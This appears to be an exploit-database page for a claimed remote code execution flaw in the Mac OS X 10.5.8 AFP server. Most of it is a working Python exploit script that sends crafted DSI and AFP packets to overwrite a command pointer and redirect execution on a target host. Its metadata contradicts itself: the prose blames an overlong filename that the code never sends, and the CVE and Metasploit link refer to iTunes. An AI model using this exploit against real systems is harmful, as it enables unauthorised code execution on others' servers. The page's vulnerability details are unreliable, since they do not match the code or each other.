AFP Server Remote Code Execution Vulnerability

vendor:

Mac OS X

by:

Jelmer Kuperus

9.3

CVSS

HIGH

Remote Code Execution

119

CWE

Product Name: Mac OS X

Affected Version From: Mac OS X 10.5.8

Affected Version To: Mac OS X 10.5.8

Patch Exists: YES

Related CWE: CVE-2009-0950

CPE: o:apple:mac_os_x:10.5.8

Metasploit: https://www.rapid7.com/db/vulnerabilities/apple-itunes-cve-2009-0950/

Other Scripts: N/A

Platforms Tested: Mac

2009

AFP Server Remote Code Execution Vulnerability

This exploit is a remote code execution vulnerability in the AFP Server service of Mac OS X 10.5.8. It allows an attacker to execute arbitrary code on the vulnerable system by sending a specially crafted AFP request packet. The vulnerability is caused by a stack-based buffer overflow in the AFP Server service, which can be triggered by sending a specially crafted AFP request packet with an overly long filename. The overflow occurs when the filename is copied into a fixed-length buffer on the stack. This can be exploited to execute arbitrary code on the vulnerable system.

Mitigation:

Apple has released a security update to address this vulnerability. Users should upgrade to the latest version of Mac OS X 10.5.8.

Source

Exploit-DB raw data:

import socket
import struct
import sys
if len(sys.argv) != 3:
    sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Attempting connection to " + ip + ":" + sys.argv[2]
sock.connect((ip, port))
dsi_payload = "\x00\x00\x40\x00" # client quantum
dsi_payload += '\x00\x00\x00\x00' # overwrites datasize
dsi_payload += struct.pack("I", 0xdeadbeef) # overwrites quantum
dsi_payload += struct.pack("I", 0xfeedface) # overwrites the ids
dsi_payload += struct.pack("Q", 0x63b660) # overwrite commands ptr
dsi_opensession = "\x01" # attention quantum option
dsi_opensession += struct.pack("B", len(dsi_payload)) # length
dsi_opensession += dsi_payload
dsi_header = "\x00" # "request" flag
dsi_header += "\x04" # open session command
dsi_header += "\x00\x01" # request id
dsi_header += "\x00\x00\x00\x00" # data offset
dsi_header += struct.pack(">I", len(dsi_opensession))
dsi_header += "\x00\x00\x00\x00" # reserved
dsi_header += dsi_opensession
sock.sendall(dsi_header) 
resp = sock.recv(1024)
print "[+] Open Session complete"
afp_command = "\x01" # invoke the second entry in the table
afp_command += "\x00" # protocol defined padding
afp_command += "\x00\x00\x00\x00\x00\x00" # pad out the first entry
afp_command += struct.pack("Q", 0x4295f0) # address to jump to
dsi_header = "\x00" # "request" flag
dsi_header += "\x02" # "AFP" command
dsi_header += "\x00\x02" # request id
dsi_header += "\x00\x00\x00\x00" # data offset
dsi_header += struct.pack(">I", len(afp_command))
dsi_header += '\x00\x00\x00\x00' # reserved
dsi_header += afp_command
print "[+] Sending get server info request"
sock.sendall(dsi_header) 
resp = sock.recv(1024)
print resp
print "[+] Fin."